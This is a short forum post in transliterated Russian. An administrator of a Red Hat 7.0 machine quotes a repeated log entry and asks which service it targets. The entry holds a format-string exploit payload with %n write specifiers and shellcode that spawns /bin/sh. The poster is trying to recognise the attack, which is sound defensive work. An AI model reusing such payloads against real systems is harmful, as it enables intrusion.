V logah proskochila (mnogokratno) takaya vesh:
Jun 25 14:18:28 vskur4 SERVER[14790]: Dispatch_input: bad request line 'BBЬуя?Эуя?Юуя?Яуя?XXXXXXXXXXXXXXXXXX%.156u%300$n%.21u%301$nsecurity%302$n%.192u %303$n?????????????????????????????????????????????????????????????????????????? ???????????????????????????????????????????????????????????????????????????????? ??????????????????????????????????????????????1Ы1Й1А°FН??е1Т?f?Р1Й?ЛC?]шC?]фK?Mь ?MфН?1Й?EфCf?]мfЗEо^O'?Mр?Eм?EшЖEь^P?Р?MфН??РCCН??РCН??Г1Й???РН??РAН?л^X^?u^H1А? F^G?E^L°^K?у?M^H?U^LН?игяяя/bin/sh'
Chto bi eto moglo bit'? Pohoje na buffer overflow attack (viglyadit kak ispolnaemii' kod, zaranee podobrannoi' dlini - s ? v seredine i vizovom /bin/sh v konce), tol'ko k kakomu servisu? Chto za process SERVER - ne znaiu, nomer processa kajdii' raz novii', odnoznachno ne httpd i sendmail - na etoi' mashine ih prosto net; mashini RH7.0, zapusheni nfsd,sshd,ntpd,atd. Kak ponyat' - kakoi- servis eto pishet?